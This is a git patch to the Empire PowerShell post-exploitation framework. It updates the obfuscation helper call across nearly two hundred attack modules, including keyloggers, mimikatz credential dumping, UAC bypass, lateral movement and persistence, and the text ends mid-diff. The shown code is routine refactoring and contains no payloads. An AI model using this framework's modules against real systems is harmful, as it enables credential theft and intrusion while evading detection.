From 2c7d62593b95bed9116443d53ac520d30f9775cd Mon Sep 17 00:00:00 2001 From: xorrior Date: Fri, 20 Oct 2017 23:16:19 -0400 Subject: [PATCH] Updated obfuscate function arguments in all powershell modules --- .../powershell/code_execution/invoke_dllinjection.py | 2 +- .../code_execution/invoke_metasploitpayload.py | 2 +- .../code_execution/invoke_reflectivepeinjection.py | 2 +- .../powershell/code_execution/invoke_shellcode.py | 2 +- .../code_execution/invoke_shellcodemsil.py | 2 +- lib/modules/powershell/collection/ChromeDump.py | 2 +- lib/modules/powershell/collection/FoxDump.py | 2 +- lib/modules/powershell/collection/USBKeylogger.py | 2 +- lib/modules/powershell/collection/WebcamRecorder.py | 2 +- lib/modules/powershell/collection/browser_data.py | 2 +- .../powershell/collection/clipboard_monitor.py | 2 +- lib/modules/powershell/collection/file_finder.py | 2 +- .../powershell/collection/find_interesting_file.py | 2 +- .../powershell/collection/get_indexed_item.py | 2 +- .../collection/get_sql_column_sample_data.py | 2 +- lib/modules/powershell/collection/get_sql_query.py | 2 +- lib/modules/powershell/collection/inveigh.py | 2 +- lib/modules/powershell/collection/keylogger.py | 2 +- lib/modules/powershell/collection/minidump.py | 2 +- lib/modules/powershell/collection/netripper.py | 2 +- lib/modules/powershell/collection/ninjacopy.py | 2 +- lib/modules/powershell/collection/packet_capture.py | 2 +- lib/modules/powershell/collection/prompt.py | 2 +- lib/modules/powershell/collection/screenshot.py | 2 +- .../collection/vaults/add_keepass_config_trigger.py | 2 +- .../collection/vaults/find_keepass_config.py | 2 +- .../collection/vaults/get_keepass_config_trigger.py | 2 +- lib/modules/powershell/collection/vaults/keethief.py | 2 +- .../vaults/remove_keepass_config_trigger.py | 2 +- .../powershell/credentials/credential_injection.py | 2 +- .../powershell/credentials/enum_cred_store.py | 2 +- .../powershell/credentials/invoke_kerberoast.py | 2 +- lib/modules/powershell/credentials/mimikatz/cache.py | 2 +- lib/modules/powershell/credentials/mimikatz/certs.py | 2 +- .../powershell/credentials/mimikatz/command.py | 2 +- .../powershell/credentials/mimikatz/dcsync.py | 2 +- .../credentials/mimikatz/dcsync_hashdump.py | 2 +- .../credentials/mimikatz/extract_tickets.py | 2 +- .../powershell/credentials/mimikatz/golden_ticket.py | 2 +- .../credentials/mimikatz/logonpasswords.py | 2 +- .../powershell/credentials/mimikatz/lsadump.py | 2 +- .../powershell/credentials/mimikatz/mimitokens.py | 2 +- lib/modules/powershell/credentials/mimikatz/pth.py | 2 +- lib/modules/powershell/credentials/mimikatz/purge.py | 2 +- lib/modules/powershell/credentials/mimikatz/sam.py | 2 +- .../powershell/credentials/mimikatz/silver_ticket.py | 2 +- .../powershell/credentials/mimikatz/trust_keys.py | 2 +- lib/modules/powershell/credentials/powerdump.py | 2 +- lib/modules/powershell/credentials/sessiongopher.py | 2 +- lib/modules/powershell/credentials/tokens.py | 2 +- .../powershell/credentials/vault_credential.py | 2 +- lib/modules/powershell/exfiltration/egresscheck.py | 2 +- lib/modules/powershell/exploitation/exploit_jboss.py | 2 +- .../powershell/exploitation/exploit_jenkins.py | 2 +- .../powershell/lateral_movement/inveigh_relay.py | 2 +- .../powershell/lateral_movement/invoke_dcom.py | 2 +- .../lateral_movement/invoke_executemsbuild.py | 2 +- .../powershell/lateral_movement/invoke_psexec.py | 2 +- .../powershell/lateral_movement/invoke_psremoting.py | 2 +- .../powershell/lateral_movement/invoke_sqloscmd.py | 2 +- .../powershell/lateral_movement/invoke_sshcommand.py | 2 +- .../powershell/lateral_movement/invoke_wmi.py | 2 +- .../lateral_movement/invoke_wmi_debugger.py | 2 +- .../lateral_movement/jenkins_script_console.py | 2 +- .../lateral_movement/new_gpo_immediate_task.py | 2 +- lib/modules/powershell/management/disable_rdp.py | 2 +- .../powershell/management/downgrade_account.py | 2 +- .../powershell/management/enable_multi_rdp.py | 2 +- lib/modules/powershell/management/enable_rdp.py | 2 +- lib/modules/powershell/management/get_domain_sid.py | 2 +- lib/modules/powershell/management/honeyhash.py | 2 +- lib/modules/powershell/management/invoke_script.py | 2 +- lib/modules/powershell/management/lock.py | 2 +- lib/modules/powershell/management/logoff.py | 2 +- .../management/mailraider/disable_security.py | 2 +- .../management/mailraider/get_emailitems.py | 2 +- .../management/mailraider/get_subfolders.py | 2 +- .../powershell/management/mailraider/mail_search.py | 2 +- .../powershell/management/mailraider/search_gal.py | 2 +- .../powershell/management/mailraider/send_mail.py | 2 +- .../powershell/management/mailraider/view_email.py | 2 +- lib/modules/powershell/management/psinject.py | 2 +- .../powershell/management/reflective_inject.py | 2 +- lib/modules/powershell/management/restart.py | 2 +- lib/modules/powershell/management/runas.py | 2 +- lib/modules/powershell/management/sid_to_user.py | 2 +- lib/modules/powershell/management/spawn.py | 2 +- lib/modules/powershell/management/spawnas.py | 2 +- lib/modules/powershell/management/switch_listener.py | 2 +- lib/modules/powershell/management/timestomp.py | 2 +- lib/modules/powershell/management/user_to_sid.py | 2 +- lib/modules/powershell/management/vnc.py | 2 +- .../powershell/management/wdigest_downgrade.py | 2 +- lib/modules/powershell/management/zipfolder.py | 2 +- .../powershell/persistence/elevated/registry.py | 2 +- .../powershell/persistence/elevated/schtasks.py | 4 ++-- lib/modules/powershell/persistence/elevated/wmi.py | 4 ++-- .../powershell/persistence/misc/add_netuser.py | 2 +- .../powershell/persistence/misc/add_sid_history.py | 2 +- lib/modules/powershell/persistence/misc/debugger.py | 4 ++-- .../persistence/misc/disable_machine_acct_change.py | 4 ++-- lib/modules/powershell/persistence/misc/get_ssps.py | 2 +- .../powershell/persistence/misc/install_ssp.py | 2 +- lib/modules/powershell/persistence/misc/memssp.py | 2 +- .../powershell/persistence/misc/skeleton_key.py | 2 +- .../powershell/persistence/powerbreach/deaduser.py | 4 ++-- .../powershell/persistence/powerbreach/eventlog.py | 4 ++-- .../powershell/persistence/powerbreach/resolver.py | 4 ++-- .../powershell/persistence/userland/backdoor_lnk.py | 2 +- .../powershell/persistence/userland/registry.py | 4 ++-- .../powershell/persistence/userland/schtasks.py | 4 ++-- lib/modules/powershell/privesc/ask.py | 2 +- lib/modules/powershell/privesc/bypassuac.py | 2 +- lib/modules/powershell/privesc/bypassuac_eventvwr.py | 2 +- .../privesc/bypassuac_tokenmanipulation.py | 2 +- lib/modules/powershell/privesc/bypassuac_wscript.py | 2 +- lib/modules/powershell/privesc/getsystem.py | 2 +- lib/modules/powershell/privesc/gpp.py | 2 +- lib/modules/powershell/privesc/mcafee_sitelist.py | 2 +- lib/modules/powershell/privesc/ms16-032.py | 2 +- lib/modules/powershell/privesc/ms16-135.py | 2 +- lib/modules/powershell/privesc/powerup/allchecks.py | 2 +- .../powershell/privesc/powerup/find_dllhijack.py | 2 +- .../privesc/powerup/service_exe_restore.py | 2 +- .../powershell/privesc/powerup/service_exe_stager.py | 2 +- .../privesc/powerup/service_exe_useradd.py | 2 +- .../powershell/privesc/powerup/service_stager.py | 2 +- .../powershell/privesc/powerup/service_useradd.py | 2 +- .../powershell/privesc/powerup/write_dllhijacker.py | 2 +- lib/modules/powershell/privesc/tater.py | 2 +- lib/modules/powershell/recon/find_fruit.py | 2 +- .../recon/get_sql_server_login_default_pw.py | 2 +- lib/modules/powershell/recon/http_login.py | 2 +- .../situational_awareness/host/antivirusproduct.py | 2 +- .../situational_awareness/host/computerdetails.py | 12 ++++++------ .../situational_awareness/host/dnsserver.py | 2 +- .../host/findtrusteddocuments.py | 2 +- .../situational_awareness/host/get_pathacl.py | 2 +- .../situational_awareness/host/get_proxy.py | 2 +- .../host/monitortcpconnections.py | 2 +- .../situational_awareness/host/paranoia.py | 2 +- .../powershell/situational_awareness/host/winenum.py | 2 +- .../situational_awareness/network/arpscan.py | 2 +- .../situational_awareness/network/bloodhound.py | 2 +- .../network/get_exploitable_system.py | 2 +- .../situational_awareness/network/get_spn.py | 2 +- .../network/get_sql_instance_domain.py | 2 +- .../network/get_sql_server_info.py | 2 +- .../situational_awareness/network/portscan.py | 2 +- .../network/powerview/find_computer_field.py | 2 +- .../network/powerview/find_foreign_group.py | 2 +- .../network/powerview/find_foreign_user.py | 2 +- .../network/powerview/find_gpo_computer_admin.py | 2 +- .../network/powerview/find_gpo_location.py | 2 +- .../network/powerview/find_localadmin_access.py | 2 +- .../network/powerview/find_managed_security_group.py | 2 +- .../network/powerview/find_user_field.py | 2 +- .../network/powerview/get_cached_rdpconnection.py | 2 +- .../network/powerview/get_computer.py | 2 +- .../network/powerview/get_dfs_share.py | 2 +- .../network/powerview/get_domain_controller.py | 2 +- .../network/powerview/get_domain_policy.py | 2 +- .../network/powerview/get_domain_trust.py | 2 +- .../network/powerview/get_fileserver.py | 2 +- .../network/powerview/get_forest.py | 2 +- .../network/powerview/get_forest_domain.py | 2 +- .../network/powerview/get_gpo.py | 2 +- .../network/powerview/get_gpo_computer.py | 2 +- .../network/powerview/get_group.py | 2 +- .../network/powerview/get_group_member.py | 2 +- .../network/powerview/get_localgroup.py | 2 +- .../network/powerview/get_loggedon.py | 2 +- .../network/powerview/get_object_acl.py | 2 +- .../network/powerview/get_ou.py | 2 +- .../network/powerview/get_rdp_session.py | 2 +- .../network/powerview/get_session.py | 2 +- .../network/powerview/get_site.py | 2 +- .../network/powerview/get_subnet.py | 2 +- .../network/powerview/get_user.py | 2 +- .../network/powerview/map_domain_trust.py | 2 +- .../network/powerview/process_hunter.py | 2 +- .../network/powerview/set_ad_object.py | 2 +- .../network/powerview/share_finder.py | 2 +- .../network/powerview/user_hunter.py | 2 +- .../situational_awareness/network/reverse_dns.py | 2 +- .../situational_awareness/network/smbautobrute.py | 2 +- .../situational_awareness/network/smbscanner.py | 2 +- lib/modules/powershell/trollsploit/get_schwifty.py | 2 +- lib/modules/powershell/trollsploit/message.py | 2 +- lib/modules/powershell/trollsploit/process_killer.py | 2 +- lib/modules/powershell/trollsploit/rick_ascii.py | 2 +- lib/modules/powershell/trollsploit/rick_astley.py | 2 +- lib/modules/powershell/trollsploit/thunderstruck.py | 2 +- lib/modules/powershell/trollsploit/voicetroll.py | 2 +- lib/modules/powershell/trollsploit/wallpaper.py | 2 +- lib/modules/powershell/trollsploit/wlmdr.py | 2 +- 196 files changed, 210 insertions(+), 210 deletions(-) diff --git a/lib/modules/powershell/code_execution/invoke_dllinjection.py b/lib/modules/powershell/code_execution/invoke_dllinjection.py index 3f2a94e..682b8d7 100644 --- a/lib/modules/powershell/code_execution/invoke_dllinjection.py +++ b/lib/modules/powershell/code_execution/invoke_dllinjection.py @@ -88,6 +88,6 @@ class Module: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/code_execution/invoke_metasploitpayload.py b/lib/modules/powershell/code_execution/invoke_metasploitpayload.py index 38c4c6d..62c83f8 100644 --- a/lib/modules/powershell/code_execution/invoke_metasploitpayload.py +++ b/lib/modules/powershell/code_execution/invoke_metasploitpayload.py @@ -72,6 +72,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py b/lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py index 531b1f9..7851ee4 100644 --- a/lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py +++ b/lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py @@ -127,6 +127,6 @@ class Module: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/code_execution/invoke_shellcode.py b/lib/modules/powershell/code_execution/invoke_shellcode.py index 2bf16e6..354c783 100644 --- a/lib/modules/powershell/code_execution/invoke_shellcode.py +++ b/lib/modules/powershell/code_execution/invoke_shellcode.py @@ -145,6 +145,6 @@ class Module: scriptEnd += "; 'Shellcode injected.'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/code_execution/invoke_shellcodemsil.py b/lib/modules/powershell/code_execution/invoke_shellcodemsil.py index fe0d112..e18b565 100644 --- a/lib/modules/powershell/code_execution/invoke_shellcodemsil.py +++ b/lib/modules/powershell/code_execution/invoke_shellcodemsil.py @@ -89,6 +89,6 @@ class Module: sc = ",0".join(values['Value'].split("\\"))[1:] scriptEnd += " -" + str(option) + " @(" + sc + ")" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/ChromeDump.py b/lib/modules/powershell/collection/ChromeDump.py index 1c3ccd0..dec2c33 100644 --- a/lib/modules/powershell/collection/ChromeDump.py +++ b/lib/modules/powershell/collection/ChromeDump.py @@ -103,6 +103,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/FoxDump.py b/lib/modules/powershell/collection/FoxDump.py index 29ae719..b7fb455 100644 --- a/lib/modules/powershell/collection/FoxDump.py +++ b/lib/modules/powershell/collection/FoxDump.py @@ -107,6 +107,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/USBKeylogger.py b/lib/modules/powershell/collection/USBKeylogger.py index 3ab8daf..8fa6881 100644 --- a/lib/modules/powershell/collection/USBKeylogger.py +++ b/lib/modules/powershell/collection/USBKeylogger.py @@ -79,6 +79,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/WebcamRecorder.py b/lib/modules/powershell/collection/WebcamRecorder.py index 763cf41..6258f09 100644 --- a/lib/modules/powershell/collection/WebcamRecorder.py +++ b/lib/modules/powershell/collection/WebcamRecorder.py @@ -216,5 +216,5 @@ Start-WebcamRecorder""" else: script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/browser_data.py b/lib/modules/powershell/collection/browser_data.py index 0a455b5..6f0f9a0 100644 --- a/lib/modules/powershell/collection/browser_data.py +++ b/lib/modules/powershell/collection/browser_data.py @@ -103,6 +103,6 @@ class Module: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/clipboard_monitor.py b/lib/modules/powershell/collection/clipboard_monitor.py index d12fe04..e13bac2 100644 --- a/lib/modules/powershell/collection/clipboard_monitor.py +++ b/lib/modules/powershell/collection/clipboard_monitor.py @@ -89,6 +89,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/file_finder.py b/lib/modules/powershell/collection/file_finder.py index e66d908..8b8f7bf 100644 --- a/lib/modules/powershell/collection/file_finder.py +++ b/lib/modules/powershell/collection/file_finder.py @@ -162,5 +162,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/find_interesting_file.py b/lib/modules/powershell/collection/find_interesting_file.py index 1a68474..6795ee6 100644 --- a/lib/modules/powershell/collection/find_interesting_file.py +++ b/lib/modules/powershell/collection/find_interesting_file.py @@ -127,5 +127,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/get_indexed_item.py b/lib/modules/powershell/collection/get_indexed_item.py index 3039b13..37c8a8e 100644 --- a/lib/modules/powershell/collection/get_indexed_item.py +++ b/lib/modules/powershell/collection/get_indexed_item.py @@ -88,6 +88,6 @@ class Module: scriptEnd += " | ?{!($_.ITEMURL -like '*AppData*')} | Select-Object ITEMURL, COMPUTERNAME, FILEOWNER, SIZE, DATECREATED, DATEACCESSED, DATEMODIFIED, AUTOSUMMARY" scriptEnd += " | fl | Out-String;" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/get_sql_column_sample_data.py b/lib/modules/powershell/collection/get_sql_column_sample_data.py index 7f9d007..3f32243 100644 --- a/lib/modules/powershell/collection/get_sql_column_sample_data.py +++ b/lib/modules/powershell/collection/get_sql_column_sample_data.py @@ -114,6 +114,6 @@ class Module: if no_defaults: scriptEnd += " -NoDefaults " if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/get_sql_query.py b/lib/modules/powershell/collection/get_sql_query.py index bdf45f5..7079566 100644 --- a/lib/modules/powershell/collection/get_sql_query.py +++ b/lib/modules/powershell/collection/get_sql_query.py @@ -89,6 +89,6 @@ class Module: scriptEnd += " -Instance "+instance scriptEnd += " -Query "+"\'"+query+"\'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/inveigh.py b/lib/modules/powershell/collection/inveigh.py index 828d8ef..bf3425c 100644 --- a/lib/modules/powershell/collection/inveigh.py +++ b/lib/modules/powershell/collection/inveigh.py @@ -232,6 +232,6 @@ class Module: else: scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/keylogger.py b/lib/modules/powershell/collection/keylogger.py index 2318eb6..0a5d619 100644 --- a/lib/modules/powershell/collection/keylogger.py +++ b/lib/modules/powershell/collection/keylogger.py @@ -77,6 +77,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/minidump.py b/lib/modules/powershell/collection/minidump.py index 0b74e07..ea99308 100644 --- a/lib/modules/powershell/collection/minidump.py +++ b/lib/modules/powershell/collection/minidump.py @@ -98,6 +98,6 @@ class Module: if option != "Agent" and option != "ProcessName" and option != "ProcessId": scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/netripper.py b/lib/modules/powershell/collection/netripper.py index 0be077d..304b1fa 100644 --- a/lib/modules/powershell/collection/netripper.py +++ b/lib/modules/powershell/collection/netripper.py @@ -117,6 +117,6 @@ class Module: scriptEnd += ";'Invoke-NetRipper completed.'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/ninjacopy.py b/lib/modules/powershell/collection/ninjacopy.py index 8f9aa35..a056072 100644 --- a/lib/modules/powershell/collection/ninjacopy.py +++ b/lib/modules/powershell/collection/ninjacopy.py @@ -103,6 +103,6 @@ class Module: scriptEnd += "; Write-Output 'Invoke-NinjaCopy Completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/packet_capture.py b/lib/modules/powershell/collection/packet_capture.py index ae26455..8c367c0 100644 --- a/lib/modules/powershell/collection/packet_capture.py +++ b/lib/modules/powershell/collection/packet_capture.py @@ -90,5 +90,5 @@ class Module: if persistent != "": script += " persistent=yes" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/prompt.py b/lib/modules/powershell/collection/prompt.py index b0b00da..4339abd 100644 --- a/lib/modules/powershell/collection/prompt.py +++ b/lib/modules/powershell/collection/prompt.py @@ -120,5 +120,5 @@ Invoke-Prompt """ else: script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/screenshot.py b/lib/modules/powershell/collection/screenshot.py index 091a2d2..b5a4fc2 100644 --- a/lib/modules/powershell/collection/screenshot.py +++ b/lib/modules/powershell/collection/screenshot.py @@ -115,5 +115,5 @@ Get-Screenshot""" else: script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py b/lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py index a348ea6..282050f 100644 --- a/lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py +++ b/lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py @@ -118,6 +118,6 @@ class Module: scriptEnd += "\nFind-KeePassconfig | Get-KeePassConfigTrigger " scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/vaults/find_keepass_config.py b/lib/modules/powershell/collection/vaults/find_keepass_config.py index b4ef71a..5e63397 100644 --- a/lib/modules/powershell/collection/vaults/find_keepass_config.py +++ b/lib/modules/powershell/collection/vaults/find_keepass_config.py @@ -90,6 +90,6 @@ class Module: scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py b/lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py index b0a0935..a937b0b 100644 --- a/lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py +++ b/lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py @@ -90,6 +90,6 @@ class Module: scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/vaults/keethief.py b/lib/modules/powershell/collection/vaults/keethief.py index 836c398..9122971 100644 --- a/lib/modules/powershell/collection/vaults/keethief.py +++ b/lib/modules/powershell/collection/vaults/keethief.py @@ -90,6 +90,6 @@ class Module: scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py b/lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py index 7cce50d..5de6543 100644 --- a/lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py +++ b/lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py @@ -92,6 +92,6 @@ class Module: scriptEnd += "\nFind-KeePassconfig | Remove-KeePassConfigTrigger " scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/credential_injection.py b/lib/modules/powershell/credentials/credential_injection.py index 30b3638..bf541e4 100644 --- a/lib/modules/powershell/credentials/credential_injection.py +++ b/lib/modules/powershell/credentials/credential_injection.py @@ -151,6 +151,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/enum_cred_store.py b/lib/modules/powershell/credentials/enum_cred_store.py index c04fa82..7e5afc8 100644 --- a/lib/modules/powershell/credentials/enum_cred_store.py +++ b/lib/modules/powershell/credentials/enum_cred_store.py @@ -54,6 +54,6 @@ class Module: scriptEnd = "\n%s" %(scriptCmd) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/invoke_kerberoast.py b/lib/modules/powershell/credentials/invoke_kerberoast.py index ec8e320..a94ef2a 100644 --- a/lib/modules/powershell/credentials/invoke_kerberoast.py +++ b/lib/modules/powershell/credentials/invoke_kerberoast.py @@ -124,6 +124,6 @@ class Module: scriptEnd += '| fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/cache.py b/lib/modules/powershell/credentials/mimikatz/cache.py index 64f2a8d..90b0986 100644 --- 